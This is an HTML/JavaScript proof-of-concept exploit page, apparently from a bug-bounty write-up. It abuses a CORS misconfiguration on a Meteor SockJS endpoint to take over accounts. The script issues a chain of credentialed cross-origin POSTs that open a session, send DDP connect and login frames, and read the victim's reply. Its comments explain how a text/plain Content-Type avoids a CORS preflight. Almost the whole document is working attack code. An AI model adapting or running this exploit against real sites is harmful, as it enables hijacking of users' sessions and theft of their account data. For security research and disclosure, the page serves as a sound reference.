Full account takeover through a CORS misconfiguration on the target's SockJS connection endpoints (proof of concept)
<!DOCTYPE html>
<html>
<head><title>Exploiting CORS</title></head>
<body>
<center>
<h1>Getting your information through CORS</h1>
<button type="button" onclick="ProcessUrls()">Exploit</button>
</center>
<script type="text/javascript">
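// Shared state of the exploit page.
//   cont     - number of SockJS requests issued so far in the current run;
//              ProcessUrl uses it to pick the payload for each step.
//   requests - the XMLHttpRequest objects created by the current run.
var cont = 0;
var requests = [];

// Drives the five-step SockJS/DDP exchange against the target:
//   1. POST .../xhr        open the SockJS session
//   2. POST .../xhr_send   DDP "connect" frame
//   3. POST .../xhr        poll
//   4. POST .../xhr_send   DDP "login" (resume token) + three "sub" frames
//   5. POST .../xhr        poll and alert() the reply
// The requests are issued ONE AT A TIME: every step is started from the
// previous step's completion callback. The original version fired all five
// from a loop with async XHRs, so the session open, the sends and the polls
// could reach the server in any order and the final poll could come back
// before the login reply existed. The counter is also reset here, so a second
// click repeats the sequence instead of issuing five plain polls.
// NOTE(review): the host and the SockJS server/session ids in the path are
// hard-coded placeholders from the write-up; every run reuses the same
// session id - confirm the target tolerates that.
function ProcessUrls()
{
  var base = 'http://privatewebsite.com/sockjs/203/jb93ne78/';
  var urls = [
    base + 'xhr',
    base + 'xhr_send',
    base + 'xhr',
    base + 'xhr_send',
    base + 'xhr'
  ];
  var step = 0;

  requests = [];
  cont = 0;

  // Issue the next URL, or stop once the list is exhausted. Handed to
  // ProcessUrl as its completion callback so the chain continues by itself.
  function next()
  {
    if (step >= urls.length) {
      return;
    }
    var url = urls[step];
    step += 1;
    requests.push(ProcessUrl(url, next));
  }

  next();
}

// Issues one credentialed cross-origin POST and returns the XMLHttpRequest.
//   url  - SockJS endpoint: ".../xhr" opens or polls the session,
//          ".../xhr_send" delivers DDP frames.
//   done - optional; called with the XHR once the request has completed
//          (readyState 4), whatever the status, so the caller can chain
//          steps. A blocked cross-origin read surfaces as status 0 with an
//          empty body; the chain then simply carries on, as the original
//          loop did.
// The payload is chosen by the step counter (cont, after increment):
//   2 - DDP "connect"; 4 - DDP "login" + subscriptions; 5 - poll whose reply
//   is shown with alert(); any other step - plain poll, reply discarded.
// Security notes: withCredentials makes the browser attach the victim's
// cookies for the target origin, and the reply can only be read back if the
// target reflects this page's Origin in Access-Control-Allow-Origin together
// with Access-Control-Allow-Credentials: true - presumably the
// misconfiguration the write-up relies on; nothing here checks for it.
// Content-Type text/plain keeps the POST a no-preflight ("simple") CORS
// request, so a server-side check that lives only in the OPTIONS handler
// never sees it.
// NOTE(review): the resume token and subscription ids below are placeholder
// literals kept byte-for-byte from the original; what the replies contain
// depends on the target's DDP methods and publications - cannot tell from
// here.
function ProcessUrl(url, done)
{
  var connectFrame = '["{\\"msg\\":\\"connect\\",\\"version\\":\\"1\\",\\"support\\":[\\"1\\",\\"pre2\\",\\"pre1\\"]}"]';
  var loginFrame = '["{\\"msg\\":\\"method\\",\\"method\\":\\"login\\",\\"params\\":[{\\"resume\\":\\"abcabcabcabcabcabcabcabcabcabcabcabcabcabca\\"}],\\"id\\":\\"1\\"}","{\\"msg\\":\\"sub\\",\\"id\\":\\"hihihihihihihihi\\",\\"name\\":\\"meteor.loginServiceConfiguration\\",\\"params\\":[]}","{\\"msg\\":\\"sub\\",\\"id\\":\\"yzyzyzyzyzyzyzyzy\\",\\"name\\":\\"meteor_autoupdate_clientVersions\\",\\"params\\":[]}","{\\"msg\\":\\"sub\\",\\"id\\":\\"efefefefefefefefe\\",\\"name\\":\\"hooks\\",\\"params\\":[]}"]';
  var payload = null;
  var showReply = false;

  cont += 1;
  if (cont === 2) {
    payload = connectFrame;
  } else if (cont === 4) {
    payload = loginFrame;
  } else if (cont === 5) {
    showReply = true;
  }

  var http = new XMLHttpRequest();
  http.open("POST", url, true);
  http.withCredentials = true;
  http.onreadystatechange = function()
  {
    if (http.readyState !== 4) {
      return;
    }
    // Same acceptance rule as the original: only 200 or 204 counts as a reply.
    if (showReply && (http.status === 200 || http.status === 204)) {
      alert(http.responseText);
    }
    if (typeof done === 'function') {
      done(http);
    }
  };

  if (payload !== null) {
    // text/plain is a CORS-safelisted Content-Type, so no preflight is sent.
    http.setRequestHeader("Content-Type", "text/plain;charset=UTF-8");
    http.send(payload);
  } else {
    // Session open / poll: no body and no Content-Type, as in the original.
    http.send();
  }

  return http;
}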
</script>